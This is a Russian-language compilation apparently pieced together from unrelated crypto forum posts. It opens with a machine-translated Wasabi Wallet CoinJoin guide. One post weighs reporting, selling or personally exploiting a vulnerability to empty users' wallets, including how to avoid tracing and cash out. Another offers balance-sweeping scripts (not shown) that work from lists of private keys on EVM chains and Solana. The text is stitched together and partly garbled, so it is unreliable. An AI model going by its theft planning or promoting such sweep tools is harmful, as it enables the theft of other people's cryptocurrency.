После создания кошелька можно принимать на него средства. Чтобы получить адрес нужно выбрать Send, адрес и qr-код будут выведены на экран. Внизу отображается панель состояния CoinJoin -- технологии, осуществляющей смешивание монет. Coinjoin — это специальная биткойн-транзакция, в которой несколько пиров собираются вместе, чтобы буквально объединить свои монеты в одну транзакцию. Они совместно создают транзакцию, в которой каждый из них предоставляет несколько монет в качестве входных данных и свежие адреса в качестве выходных данных. Эта концепция существует с первых дней существования Биткойна, и она была формализована великим Грегом Максвеллом в этой замечательной вводной теме.
Цель состоит в том, чтобы добиться конфиденциальности, разорвав связь того, какой вход «платит на какой выход, чтобы ни один из выходов не мог быть отнесен к владельцу ввода. Wasabi позволяет централизованно координировать совместные соединения с переменными суммами без доверия (что означает, что никто не может украсть) и конфиденциально (что означает, что даже координатор не может шпионить), как описано в документе Wasabi.

После открытия горячего кошелька он автоматически запустит обратный отсчет до начала совместного использования (±10 минут). Эта и другая информация, связанная с совместным участием, отображается в нижней панели.

После завершения обратного отсчета будет автоматически запущен процесс присоединения кошелька. В нижней части панели появится синяя аура, указывающая на то, что кошелек подключен, и сообщение в панели изменится.

"Ожидание других участников". Через некоторое время синяя аура сменится на оранжевую, это указывает на то, что процесс coinjoin сейчас запущен. Васаби не позволит вам закрыть приложение во время оранжевой ауры, чтобы не нарушить раунд совместного присоединения.

"Coinjoin в процессе". Если это успешно, совместное присоединение завершено, и совместное присоединение появится в списке истории.

"Успех Coinjoin". Обратите внимание, что кошельку, возможно, придется повторить шаги совместного соединения несколько раз, прежде чем будет создано успешное совместное соединение. Так что вполне возможно, что цвета ауры изменятся без успешного совместного соединения. Пожалуйста, оставьте Wasabi Wallet включенным, и в конечном итоге произойдет успешное совместное присоединение.
По умолчанию установлена стратегия смешивания CoinJoin:
Максимальная скорость "Maximize Speed", также доступны Максимальная приватность (Maximize Privacy), Минимальная стоимость (Minimize Costs) и настройка пользователя (Customize).

Сохранение и восстановление кошелька​

Для сохранения и восстановления кошелька Wasabi достаточно seed-фразы, сохраненной в надежном месте, но если необходим кошелек в виде файла, то он находится по адресу
home/user/.walletwasabi/client/Wallets и представляет из себя файл формата json.

Всем привет! На связи сарафанное радио, и как всегда для вас, дорогие наши слушатели, порция интерес-ней-ших новостей. В студии..

Несерьезно. Неконкретно. Но интересно ваше мнение.

Вводные таковы. Щиток со своим блокчейном и дивной "экосистемой" щитков второго и третьего уровня может иметь уязвимости, позволяющие вычистить большую часть кошельков юзеров.
Капитализация - несколько лмв зелени. Вертится на известных биржах.

Вопрос. Если удасться дожать до реализации уязвимости, то как лучше поступить? =)

1. Заявить о проблемах разрабам-овнерам с пруфами и рассчитывать на ббаунти. Красиво, но..но вы поняли. Шансы остаться с нулями.
Или не им, а какой-то фирме посреднику, например, известной компании, торгующей зеродеями.
Какова мб сумма выплат?

2. Продать ушлым компетентным людям и не парится. Вопрос - сколько это может стоить и как в таких схемах используется гарант?
Минус - задешево и возможен кидок

3. Пытаться забрать все и самолично. Готовясь к визгам, уголовным делам и проч. Есть в этом аспекте нехорошие моменты, кстати, усугубляющие ситуацию.
Минусы - проблемы с анонимностью крипты, т.к. считаю,что щитки проще отследить по свопам, проблемы с обналом.

У нас в РФ путей к счастью много.
Что посоветуете, братьяи сестры?

п.с. Повторюсь - считаем все абстрактным вопросом. Покупателей(лохов, компаньонов, инвесторов, и проч) в данный момент не ищу, продавать нечего.
п.п.с. Тема начиналась в Болталке. Из-за несерьезности. Перенес модератор

Начитался/насмотрелся как угоняют/брутят кошельки, и стало страшна. Из софта стараюсь все мутное/с детектами запускать на виртуалке, но иногда все равно что то приходится запускать на основной машине(тяжелый софт которому нужно быстро работать). Поэтому наверно держать крипту в кошелке в расширении браузера плохая идея (кому то прилетит лог, сбрутят и все).
На телефоне (андроиде) тоже, т.к иногда запускаю приложения не из плейстора, да и вообще ведроид дырявый.
Я так понимаю лучший варинт купить отдельное устройство(макбук/айфон) для криптоприложений (горячих программных кошельков)?
Еще есть страх (слышал истории) как челам блокировали транзакции на горячем кошельке за грязный aml, или за то что это якобы деньги от ransom, или что там кто то якобы спонсировал терроризм. Это правда?
Че теперь обязательно аппаратный ledger покупать? Ведь по сути во всяких горячих trust wallet приватный ключ хранится на сервере, и они могут что угодно сделать с твоими деньгами. Например заморозить или отнять по указке спецслужб, за то что ты какой то неправильный человек из неправильной страны.
Но в аппаратных поддерживаются только популярные монеты, но нету допустим альткоинов которые хочу купить на долгосрок.

Решил объединить и выложить в массы, скрипты которые массово переводят монеты на ваш кошелек в сетях EVM, SOL

Скрипт для EVM снимает нативный баланс в таких сетях как: ETH, BSC, MATIC, RONIN, Moonbeam, Pulse, Astar, Moonriver, FTM
Требуется наличие Python (проверено на версии 3.10.11), выполнить установку компонентов из папки скриптов командой
pip install -r requirements.txt
В файл wallets.txt вставить ваши адреса и приватный ключ точно так как указано в образце, в config.py вставить ваш адрес кошелька
Данный скрипт написан мной

Скрипт для SOL снимает нативный баланс с приватных ключей
Требуется наличие Python (проверено на версии 3.10.11), выполнить установку компонентов из папки скриптов командой
pip install -r requirements.txt
В скрипте main.py необходимо указать ваш адрес кошелька, а так же заменить ноду (т.к. та что задана блочит моментально), в файл privatekeys.txt вставить ваши приватные ключи SOL
Данный скрипт был найден на просторах github, переписан мной для нормальной работы

Поблагодарить, на развитие

ETH: 0xf2F69965D1946dE59E02E310783eF3e03216977c
BTC: bc1qxqx8dhkql8kwn5d6f89de6qn9zc48xl7mlehhy
TRX: TGceFrYRnWaW7xP7v5FF95HpoCDyqRNkSd
SOL: 3yv9mey4UeiLmGNXWB57sX9YsnMjdnti89VNbymePh7t

Click to expand...

нужно по скорее